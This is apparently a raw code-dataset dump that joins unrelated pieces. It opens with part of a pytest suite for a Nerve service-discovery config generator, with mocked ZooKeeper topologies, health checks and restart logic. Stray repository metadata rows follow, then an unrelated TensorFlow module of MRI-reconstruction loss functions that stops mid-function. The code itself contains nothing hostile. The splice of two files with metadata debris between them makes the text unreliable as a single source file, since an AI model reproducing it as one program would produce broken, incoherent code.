zk_topology = configure_nerve.get_named_zookeeper_topology(
'test-type', 'test-location', '/fake/path/'
)
assert zk_topology == ['foo:42']
m.assert_called_with(
'/fake/path/test-type/test-location.yaml'
)
def get_labels_by_service_and_port(service: str, port: int, labels_dir):
if (service, port) == ('test_service', 1234):
return {'label1': 'value1', 'label2': 'value2'}
else:
return {}
def get_current_location(typ: str) -> str:
return {
'ecosystem': 'my_ecosystem',
'superregion': 'my_superregion',
'habitat': 'my_habitat',
'region': 'my_region',
}[typ]
def convert_location_type(src_loc: str, src_typ: str, dst_typ: str) -> List[str]:
if src_typ == dst_typ:
return [src_loc]
return {
('my_superregion', 'superregion', 'superregion'): ['my_superregion'],
('another_superregion', 'superregion', 'region'): ['another_region'],
('my_region', 'region', 'superregion'): ['my_superregion'],
('another_region', 'region', 'region'): ['another_region'],
('another_region', 'region', 'superregion'): ['another_superregion'],
}[(src_loc, src_typ, dst_typ)]
def get_named_zookeeper_topology(cluster_type, cluster_location, zk_topology_dir):
return {
('infrastructure', 'my_superregion'): ['1.2.3.4', '2.3.4.5'],
('infrastructure', 'another_superregion'): ['3.4.5.6', '4.5.6.7']
}[(cluster_type, cluster_location)]
@pytest.fixture
def expected_sub_config():
expected_config = {
'test_service.my_superregion:10.0.0.1.1234.v2.new': {
'zk_hosts': ['1.2.3.4', '2.3.4.5'],
'zk_path': '/smartstack/global/test_service',
'checks': [{
'rise': 1,
'uri': '/http/test_service/1234/status',
'host': '127.0.0.1',
'timeout': 2.0,
'open_timeout': 2.0,
'fall': 2,
'type': 'http',
'port': 6666,
'headers': {},
}],
'host': '10.0.0.1',
'check_interval': 3.0,
'port': 1234,
'weight': mock.sentinel.weight,
'labels': {
'label1': 'value1',
'label2': 'value2',
'superregion:my_superregion': '',
'region:my_region': '',
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
},
},
'test_service.another_superregion:10.0.0.1.1234.v2.new': {
'zk_hosts': ['3.4.5.6', '4.5.6.7'],
'zk_path': '/smartstack/global/test_service',
'checks': [{
'rise': 1,
'uri': '/http/test_service/1234/status',
'host': '127.0.0.1',
'timeout': 2.0,
'open_timeout': 2.0,
'fall': 2,
'type': 'http',
'port': 6666,
'headers': {},
}],
'host': '10.0.0.1',
'check_interval': 3.0,
'port': 1234,
'weight': mock.sentinel.weight,
'labels': {
'label1': 'value1',
'label2': 'value2',
'region:another_region': '',
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
},
},
}
return expected_config
@pytest.fixture
def expected_sub_config_with_envoy_ingress_listeners(expected_sub_config):
# Convert smartstack mesos services to smartstack k8s services
for k, v in expected_sub_config.items():
expected_sub_config[k]['host'] = '10.4.5.6'
new_expected_sub_config = {}
for k, v in expected_sub_config.items():
new_expected_sub_config[k.replace('10.0.0.1', '10.4.5.6')] = expected_sub_config[k]
# Add in full mesh envoy configs for the same service
new_expected_sub_config.update({
'test_service.my_superregion:10.4.5.6.1234': {
'zk_hosts': ['1.2.3.4', '2.3.4.5'],
'zk_path': '/envoy/global/test_service',
'checks': [{
'rise': 1,
'uri': '/https/test_service/35000/status',
'host': '10.0.0.1',
'timeout': 2.0,
'open_timeout': 2.0,
'fall': 2,
'type': 'http',
'port': 6666,
'headers': {'Host': 'test_service'},
}],
'host': '10.0.0.1',
'check_interval': 3.0,
'port': 35000,
'weight': mock.sentinel.weight,
'labels': {
'label1': 'value1',
'label2': 'value2',
'superregion:my_superregion': '',
'region:my_region': '',
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
},
},
'test_service.another_superregion:10.4.5.6.1234': {
'zk_hosts': ['3.4.5.6', '4.5.6.7'],
'zk_path': '/envoy/global/test_service',
'checks': [{
'rise': 1,
'uri': '/https/test_service/35000/status',
'host': '10.0.0.1',
'timeout': 2.0,
'open_timeout': 2.0,
'fall': 2,
'type': 'http',
'port': 6666,
'headers': {'Host': 'test_service'},
}],
'host': '10.0.0.1',
'check_interval': 3.0,
'port': 35000,
'weight': mock.sentinel.weight,
'labels': {
'label1': 'value1',
'label2': 'value2',
'region:another_region': '',
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
},
},
})
return new_expected_sub_config
def test_generate_subconfiguration(expected_sub_config):
with patch(
'nerve_tools.configure_nerve.get_current_location',
side_effect=get_current_location
), patch(
'nerve_tools.configure_nerve.convert_location_type',
side_effect=convert_location_type
), patch(
'nerve_tools.configure_nerve.get_named_zookeeper_topology',
side_effect=get_named_zookeeper_topology
), patch(
'nerve_tools.configure_nerve.get_labels_by_service_and_port',
side_effect=get_labels_by_service_and_port
):
mock_service_info = {
'port': 1234,
'routes': [('remote_location', 'local_location')],
'healthcheck_timeout_s': 2.0,
'healthcheck_mode': 'http',
'healthcheck_port': 1234,
'advertise': ['region', 'superregion'],
'extra_advertise': [
('habitat:my_habitat', 'region:another_region'),
('habitat:your_habitat', 'region:another_region'), # Ignored
],
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
}
actual_config = configure_nerve.generate_subconfiguration(
service_name='test_service',
service_info=mock_service_info,
host_ip='10.0.0.1',
hacheck_port=6666,
weight=mock.sentinel.weight,
zk_topology_dir='/fake/path',
zk_location_type='superregion',
zk_cluster_type='infrastructure',
labels_dir='/dev/null',
envoy_service_info=None,
)
assert expected_sub_config == actual_config
def test_generate_subconfiguration_k8s(expected_sub_config):
with patch(
'nerve_tools.configure_nerve.get_current_location',
side_effect=get_current_location
), patch(
'nerve_tools.configure_nerve.convert_location_type',
side_effect=convert_location_type
), patch(
'nerve_tools.configure_nerve.get_named_zookeeper_topology',
side_effect=get_named_zookeeper_topology
), patch(
'nerve_tools.configure_nerve.get_labels_by_service_and_port',
side_effect=get_labels_by_service_and_port
):
for k, v in expected_sub_config.items():
expected_sub_config[k]['host'] = '10.4.5.6'
for check in expected_sub_config[k]['checks']:
check['host'] = '10.1.2.3'
new_expected_sub_config = {}
for k, v in expected_sub_config.items():
new_expected_sub_config[k.replace('10.0.0.1', '10.4.5.6')] = expected_sub_config[k]
mock_service_info = {
'port': 1234,
'routes': [('remote_location', 'local_location')],
'healthcheck_timeout_s': 2.0,
'healthcheck_mode': 'http',
'healthcheck_port': 1234,
'hacheck_ip': '10.1.2.3',
'service_ip': '10.4.5.6',
'advertise': ['region', 'superregion'],
'extra_advertise': [
('habitat:my_habitat', 'region:another_region'),
('habitat:your_habitat', 'region:another_region'), # Ignored
],
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
}
actual_config = configure_nerve.generate_subconfiguration(
service_name='test_service',
service_info=mock_service_info,
host_ip='10.4.5.6',
hacheck_port=6666,
weight=mock.sentinel.weight,
zk_topology_dir='/fake/path',
zk_location_type='superregion',
zk_cluster_type='infrastructure',
labels_dir='/dev/null',
envoy_service_info=None,
)
assert new_expected_sub_config == actual_config
def test_generate_subconfiguration_with_envoy_ingress_listeners(
expected_sub_config_with_envoy_ingress_listeners
):
with patch(
'nerve_tools.configure_nerve.get_current_location',
side_effect=get_current_location
), patch(
'nerve_tools.configure_nerve.convert_location_type',
side_effect=convert_location_type
), patch(
'nerve_tools.configure_nerve.get_named_zookeeper_topology',
side_effect=get_named_zookeeper_topology
), patch(
'nerve_tools.configure_nerve.get_labels_by_service_and_port',
side_effect=get_labels_by_service_and_port
), patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='10.0.0.1',
), patch(
'nerve_tools.envoy.get_host_ip',
return_value='10.0.0.1',
):
mock_service_info = {
'port': 1234,
'routes': [('remote_location', 'local_location')],
'healthcheck_timeout_s': 2.0,
'healthcheck_mode': 'http',
'healthcheck_port': 1234,
'advertise': ['region', 'superregion'],
'extra_advertise': [
('habitat:my_habitat', 'region:another_region'),
('habitat:your_habitat', 'region:another_region'), # Ignored
],
'deploy_group': 'prod.canary',
'paasta_instance': 'canary',
'service_ip': '10.4.5.6',
}
mock_envoy_service_info = copy.deepcopy(mock_service_info)
mock_envoy_service_info.update({
'port': 35000,
'healthcheck_port': 35000,
'extra_healthcheck_headers': {'Host': 'test_service'},
})
actual_config = generate_subconfiguration(
service_name='test_service',
service_info=mock_service_info,
host_ip='10.0.0.1',
hacheck_port=6666,
weight=mock.sentinel.weight,
zk_topology_dir='/fake/path',
zk_location_type='superregion',
zk_cluster_type='infrastructure',
labels_dir='/dev/null',
envoy_service_info=mock_envoy_service_info,
)
assert expected_sub_config_with_envoy_ingress_listeners == actual_config
def test_generate_configuration_paasta_service():
expected_config = {
'instance_id': 'my_host',
'services': {
'foo': 17,
},
'heartbeat_path': 'test'
}
with patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='ip_address'
), patch(
'nerve_tools.configure_nerve.get_hostname',
return_value='my_host'
), patch(
'nerve_tools.configure_nerve.generate_subconfiguration',
return_value={'foo': 17}
) as mock_generate_subconfiguration:
mock_service_info = {
'port': 1234,
'healthcheck_timeout_s': 2.0,
'advertise': ['region'],
'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
}
actual_config = configure_nerve.generate_configuration(
paasta_services=[(
'test_service',
mock_service_info,
)],
puppet_services=[],
heartbeat_path='test',
hacheck_port=6666,
weight=mock.sentinel.classic_weight,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_ingress_listeners={},
)
mock_generate_subconfiguration.assert_called_once_with(
service_name='test_service',
service_info=mock_service_info,
host_ip='ip_address',
hacheck_port=6666,
weight=10,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_service_info=None,
)
assert expected_config == actual_config
def test_generate_configuration_paasta_service_with_envoy_ingress_listeners():
expected_config = {
'instance_id': 'my_host',
'services': {
'foo': 17,
},
'heartbeat_path': 'test'
}
with patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='ip_address',
), patch(
'nerve_tools.envoy.get_host_ip',
return_value='ip_address',
), patch(
'nerve_tools.configure_nerve.get_hostname',
return_value='my_host',
), patch(
'nerve_tools.configure_nerve.generate_subconfiguration',
return_value={'foo': 17}
) as mock_generate_subconfiguration:
mock_service_info = {
'port': 1234,
'healthcheck_timeout_s': 2.0,
'advertise': ['region'],
'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
}
envoy_ingress_listeners = {
('test_service.main', 1234): 35001,
('test_service.alt', 1234): 35001,
}
mock_envoy_service_main_info = copy.deepcopy(mock_service_info)
mock_envoy_service_main_info.update({
'host': 'ip_address',
'port': 35001,
'healthcheck_port': 35001,
'extra_healthcheck_headers': {'Host': 'test_service.main'},
})
mock_envoy_service_alt_info = copy.deepcopy(mock_service_info)
mock_envoy_service_alt_info.update({
'host': 'ip_address',
'port': 35001,
'healthcheck_port': 35001,
'extra_healthcheck_headers': {'Host': 'test_service.alt'},
})
actual_config = generate_configuration(
paasta_services=[
(
'test_service.main',
mock_service_info,
),
(
'test_service.alt',
mock_service_info,
)
],
puppet_services=[],
heartbeat_path='test',
hacheck_port=6666,
weight=mock.sentinel.classic_weight,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_ingress_listeners=envoy_ingress_listeners,
)
mock_generate_subconfiguration.assert_has_calls([
call(
service_name='test_service.main',
service_info=mock_service_info,
host_ip='ip_address',
hacheck_port=6666,
weight=10,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_service_info=mock_envoy_service_main_info,
),
call(
service_name='test_service.alt',
service_info=mock_service_info,
host_ip='ip_address',
hacheck_port=6666,
weight=10,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_service_info=mock_envoy_service_alt_info,
)
])
assert expected_config == actual_config
def test_generate_configuration_healthcheck_port():
expected_config = {
'instance_id': 'my_host',
'services': {
'foo': 17,
},
'heartbeat_path': 'test'
}
with patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='ip_address'
), patch(
'nerve_tools.configure_nerve.get_hostname',
return_value='my_host'
), patch(
'nerve_tools.configure_nerve.generate_subconfiguration',
return_value={'foo': 17}
) as mock_generate_subconfiguration:
mock_service_info = {
'port': 1234,
'routes': [('remote_location', 'local_location')],
'healthcheck_timeout_s': 2.0,
'healthcheck_port': 7890,
'advertise': ['region'],
'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
}
actual_config = configure_nerve.generate_configuration(
paasta_services=[(
'test_service',
mock_service_info,
)],
puppet_services=[],
heartbeat_path='test',
hacheck_port=6666,
weight=mock.sentinel.classic_weight,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_ingress_listeners={},
)
mock_generate_subconfiguration.assert_called_once_with(
service_name='test_service',
service_info=mock_service_info,
host_ip='ip_address',
hacheck_port=6666,
weight=10,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_service_info=None,
)
assert expected_config == actual_config
def test_generate_configuration_healthcheck_mode():
expected_config = {
'instance_id': 'my_host',
'services': {
'foo': 17,
},
'heartbeat_path': 'test'
}
with patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='ip_address'
), patch(
'nerve_tools.configure_nerve.get_hostname',
return_value='my_host'
), patch(
'nerve_tools.configure_nerve.generate_subconfiguration',
return_value={'foo': 17}
) as mock_generate_subconfiguration:
mock_service_info = {
'port': 1234,
'routes': [('remote_location', 'local_location')],
'healthcheck_timeout_s': 2.0,
'healthcheck_mode': 'tcp',
'healthcheck_port': 7890,
'advertise': ['region'],
'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
}
actual_config = configure_nerve.generate_configuration(
paasta_services=[(
'test_service',
mock_service_info,
)],
puppet_services=[],
heartbeat_path='test',
hacheck_port=6666,
weight=mock.sentinel.classic_weight,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_ingress_listeners={},
)
mock_generate_subconfiguration.assert_called_once_with(
service_name='test_service',
service_info=mock_service_info,
host_ip='ip_address',
hacheck_port=6666,
weight=10,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_service_info=None,
)
assert expected_config == actual_config
def test_generate_configuration_empty():
with patch(
'nerve_tools.configure_nerve.get_host_ip',
return_value='ip_address'
), patch(
'nerve_tools.configure_nerve.get_hostname',
return_value='my_host'
):
configuration = configure_nerve.generate_configuration(
paasta_services=[],
puppet_services=[],
heartbeat_path="",
hacheck_port=6666,
weight=mock.sentinel.classic_weight,
zk_topology_dir='/fake/path',
zk_location_type='fake_zk_location_type',
zk_cluster_type='fake_cluster_type',
labels_dir='/dev/null',
envoy_ingress_listeners={},
)
assert configuration == {'instance_id': 'my_host', 'services': {}, 'heartbeat_path': ''}
@contextmanager
def setup_mocks_for_main():
mock_sys = MagicMock()
mock_file_cmp = Mock()
mock_move = Mock()
mock_subprocess_call = Mock()
mock_subprocess_check_call = Mock()
mock_sleep = Mock()
mock_file_not_modified = Mock(return_value=False)
with patch.object(
sys, 'argv', ['configure-nerve']
) as mock_sys, patch(
'nerve_tools.configure_nerve.get_marathon_services_running_here_for_nerve'
), patch(
'nerve_tools.configure_nerve.get_paasta_native_services_running_here_for_nerve'
), patch(
'nerve_tools.configure_nerve.generate_configuration'
), patch(
'nerve_tools.configure_nerve.open', create=True
), patch(
'json.dump'
), patch(
'os.chmod'
), patch(
'filecmp.cmp'
) as mock_file_cmp, patch(
'shutil.move'
) as mock_move, patch(
'subprocess.call'
) as mock_subprocess_call, patch(
'subprocess.check_call'
) as mock_subprocess_check_call, patch(
'time.sleep'
) as mock_sleep, patch(
'nerve_tools.configure_nerve.file_not_modified_since', return_value=False
) as mock_file_not_modified:
mocks = (
mock_sys, mock_file_cmp, mock_move,
mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified
)
yield mocks
def test_file_not_modified_since():
fake_threshold = 10
fake_path = '/somepath'
with patch(
'time.time'
) as mock_time, patch(
'os.path.isfile', return_value=True
), patch(
'os.path.getmtime',
) as mock_getmtime:
mock_time.return_value = 10.0
mock_getmtime.return_value = mock_time.return_value + fake_threshold + 1
print(configure_nerve.file_not_modified_since(fake_path, fake_threshold))
def test_nerve_restarted_when_config_files_differ():
with setup_mocks_for_main() as (
mock_sys, mock_file_cmp, mock_move,
mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
# New and existing nerve configs differ
mock_file_cmp.return_value = False
configure_nerve.main()
expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
assert mock_move.call_args_list == [expected_move]
expected_subprocess_calls = (
call(['service', 'nerve-backup', 'start']),
call(['service', 'nerve-backup', 'stop']),
)
expected_subprocess_check_calls = (
call(['service', 'nerve', 'start']),
call(['service', 'nerve', 'stop']),
call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
)
actual_subprocess_calls = mock_subprocess_call.call_args_list
actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
assert len(expected_subprocess_calls) == len(actual_subprocess_calls)
assert len(expected_subprocess_check_calls) == len(actual_subprocess_check_calls)
assert all(
[i in actual_subprocess_calls for i in expected_subprocess_calls]
)
assert all(
[i in actual_subprocess_check_calls for i in expected_subprocess_check_calls]
)
mock_sleep.assert_called_with(30)
def test_nerve_not_restarted_when_configs_files_are_identical():
with setup_mocks_for_main() as (
mock_sys, mock_file_cmp, mock_move,
mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
# New and existing nerve configs are identical
mock_file_cmp.return_value = True
configure_nerve.main()
expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
assert mock_move.call_args_list == [expected_move]
expected_subprocess_check_calls = [
call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
]
actual_subprocess_calls = mock_subprocess_call.call_args_list
actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
assert len(actual_subprocess_calls) == 0
assert expected_subprocess_check_calls == actual_subprocess_check_calls
assert not mock_sleep.called
def test_nerve_restarted_when_heartbeat_file_stale():
with setup_mocks_for_main() as (
mock_sys, mock_file_cmp, mock_move,
mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
# New and existing nerve configs are identical
mock_file_cmp.return_value = True
mock_file_not_modified.return_value = True
configure_nerve.main()
expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
assert mock_move.call_args_list == [expected_move]
expected_subprocess_calls = (
call(['service', 'nerve-backup', 'start']),
call(['service', 'nerve-backup', 'stop']),
)
expected_subprocess_check_calls = (
call(['service', 'nerve', 'start']),
call(['service', 'nerve', 'stop']),
call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
)
actual_subprocess_calls = mock_subprocess_call.call_args_list
actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
assert len(expected_subprocess_calls) == len(actual_subprocess_calls)
assert len(expected_subprocess_check_calls) == len(actual_subprocess_check_calls)
assert all(
[i in actual_subprocess_calls for i in expected_subprocess_calls]
)
assert all(
[i in actual_subprocess_check_calls for i in expected_subprocess_check_calls]
)
mock_sleep.assert_called_with(30)
def test_nerve_not_restarted_when_heartbeat_file_valid():
with setup_mocks_for_main() as (
mock_sys, mock_file_cmp, mock_move,
mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
# New and existing nerve configs are identical
mock_file_cmp.return_value = True
configure_nerve.main()
expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
assert mock_move.call_args_list == [expected_move]
expected_subprocess_check_calls = [
call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
]
actual_subprocess_calls = mock_subprocess_call.call_args_list
actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
assert len(actual_subprocess_calls) == 0
assert expected_subprocess_check_calls == actual_subprocess_check_calls
assert not mock_sleep.called
| 34.582072
| 98
| 0.590958
| 3,223
| 29,706
| 5.054608
| 0.071983
| 0.042109
| 0.04082
| 0.051562
| 0.84249
| 0.821128
| 0.792708
| 0.772512
| 0.765822
| 0.746915
| 0
| 0.024849
| 0.294183
| 29,706
| 858
| 99
| 34.622378
| 0.752134
| 0.010402
| 0
| 0.714859
| 0
| 0
| 0.248069
| 0.10947
| 0
| 0
| 0
| 0
| 0.045515
| 1
| 0.028112
| false
| 0
| 0.02008
| 0.002677
| 0.058902
| 0.001339
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8738966016e8184fc947f7d9569cb68e390487a6
| 11,692
|
py
|
Python
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 16
|
2020-07-06T00:33:46.000Z
|
2021-04-22T20:17:12.000Z
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 1
|
2020-07-11T21:21:36.000Z
|
2021-02-18T19:29:03.000Z
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 5
|
2020-07-06T01:17:31.000Z
|
2021-01-20T15:15:31.000Z
|
import sys
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.keras import backend as K
from interlacer import utils
try:
import lpips_tf
except:
pass
def join_reim_mag_output(tensor):
"""
Args:
tensor: Tensor of shape (batch_size, n, n, 2)
Returns:
Tensor of shape (batch_size, n, n) with joined real and imag parts
"""
return tf.expand_dims(K.abs(utils.join_reim_tensor(tensor)), -1)
def fourier_loss(output_domain, loss):
"""Specifies a function which computes the appropriate loss function.
Loss function here is computed on Fourier space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
loss(str): Loss type ('L1' or 'L2')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'FREQ'):
if(loss == 'L1'):
def fourier_l1(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return K.mean(K.abs(y_true - y_pred))
return fourier_l1
elif(loss == 'L2'):
def fourier_l2(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return fourier_l2
elif(output_domain == 'IMAGE'):
if(loss == 'L1'):
def fourier_l1(y_true, y_pred):
y_true_fourier = utils.convert_tensor_to_frequency_domain(
y_true)
y_pred_fourier = utils.convert_tensor_to_frequency_domain(
y_pred)
y_true = utils.join_reim_tensor(y_true_fourier)
y_pred = utils.join_reim_tensor(y_pred_fourier)
return K.mean(K.abs(y_true - y_pred))
return fourier_l1
elif(loss == 'L2'):
def fourier_l2(y_true, y_pred):
y_true_fourier = utils.convert_tensor_to_frequency_domain(
y_true)
y_pred_fourier = utils.convert_tensor_to_frequency_domain(
y_pred)
y_true = utils.join_reim_tensor(y_true_fourier)
y_pred = utils.join_reim_tensor(y_pred_fourier)
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return fourier_l2
def comp_image_loss(output_domain, loss):
"""Specifies a function which computes the appropriate loss function.
Loss function here is computed on real and imaginary components of image data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
loss(str): Loss type ('L1' or 'L2')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
if(loss == 'L1'):
def image_l1(y_true, y_pred):
return K.mean(K.abs(y_true - y_pred))
return image_l1
elif(loss == 'L2'):
def image_l2(y_true, y_pred):
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return image_l2
elif(output_domain == 'FREQ'):
if(loss == 'L1'):
def image_l1(y_true, y_pred):
y_true = utils.convert_tensor_to_image_domain(y_true)
y_pred = utils.convert_tensor_to_image_domain(y_pred)
return K.mean(K.abs(y_true - y_pred))
return image_l1
elif(loss == 'L2'):
def image_l2(y_true, y_pred):
y_true = utils.convert_tensor_to_image_domain(y_true)
y_pred = utils.convert_tensor_to_image_domain(y_pred)
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return image_l2
def image_loss(output_domain, loss):
"""Specifies a function which computes the appropriate loss function.
Loss function here is computed on image space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
loss(str): Loss type ('L1' or 'L2')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
if(loss == 'L1'):
def image_l1(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return K.mean(K.abs(y_true - y_pred))
return image_l1
elif(loss == 'L2'):
def image_l2(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return image_l2
elif(output_domain == 'FREQ'):
if(loss == 'L1'):
def image_l1(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
y_pred = join_reim_mag_output(y_pred_image)
return K.mean(K.abs(y_true - y_pred))
return image_l1
elif(loss == 'L2'):
def image_l2(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
y_pred = join_reim_mag_output(y_pred_image)
return K.mean(K.pow(K.abs(y_true - y_pred), 2))
return image_l2
def joint_img_freq_loss(output_domain, loss, loss_lambda):
"""Specifies a function which computes the appropriate loss function.
Loss function here is computed on both Fourier and image space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
loss(str): Loss type ('L1' or 'L2')
loss_lambda(float): Weighting of freq loss vs image loss
Returns:
Function computing loss value from a true and predicted input
"""
def joint_loss(y_true, y_pred):
return(image_loss(output_domain, loss)(y_true, y_pred) + loss_lambda * fourier_loss(output_domain, loss)(y_true, y_pred))
return joint_loss
if 'lpips_tf' in sys.modules:
def lpips(output_domain):
"""Specifies a function which computes the appropriate loss function.
Loss function here is SSIM on image-space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
def image_lpips(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
y_true = K.tile(y_true, [1, 1, 1, 3])
y_pred = K.tile(y_pred, [1, 1, 1, 3])
return lpips_tf.lpips(y_true, y_pred, model='net-lin', net='alex')
return image_lpips
elif(output_domain == 'FREQ'):
def image_lpips(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
y_pred = join_reim_mag_output(y_pred_image)
y_true = K.tile(y_true, [1, 1, 1, 3])
y_pred = K.tile(y_pred, [1, 1, 1, 3])
return lpips_tf.lpips(
y_true, y_pred, model='net-lin', net='alex')
return image_lpips
def joint_fastmri_loss(output_domain, loss):
"""Specifies a function which computes the appropriate loss function.
Loss function here is a combination of SSIM, PSNR, and componentwise error.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
loss(str): Loss type ('L1' or 'L2')
Returns:
Function computing loss value from a true and predicted input
"""
def combined_loss(y_true, y_pred):
return(ssim(output_domain)(y_true, y_pred) + 1 / 33.0 * psnr(output_domain)(y_true, y_pred) + 20 * comp_image_loss(output_domain, loss)(y_true, y_pred))
return combined_loss
def ssim(output_domain):
"""Specifies a function which computes the appropriate loss function.
Loss function here is SSIM on image-space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
def image_ssim(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return -1 * tf.image.ssim(y_true, y_pred,
max_val=K.max(y_true), filter_size=7)
return image_ssim
elif(output_domain == 'FREQ'):
def image_ssim(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
y_pred = join_reim_mag_output(y_pred_image)
return -1 * tf.image.ssim(y_true, y_pred,
max_val=K.max(y_true), filter_size=7)
return image_ssim
def ssim_multiscale(output_domain):
"""Specifies a function which computes the appropriate loss function.
Loss function here is mulstiscale SSIM on image-space data.
Args:
output_domain(str): Network output domain ('FREQ' or 'IMAGE')
Returns:
Function computing loss value from a true and predicted input
"""
if(output_domain == 'IMAGE'):
def image_ssim_ms(y_true, y_pred):
y_true = join_reim_mag_output(y_true)
y_pred = join_reim_mag_output(y_pred)
return -1 * \
tf.image.ssim_multiscale(y_true, y_pred, max_val=K.max(y_true))
return image_ssim_ms
elif(output_domain == 'FREQ'):
def image_ssim_ms(y_true, y_pred):
y_true_image = utils.convert_tensor_to_image_domain(y_true)
y_pred_image = utils.convert_tensor_to_image_domain(y_pred)
y_true = join_reim_mag_output(y_true_image)
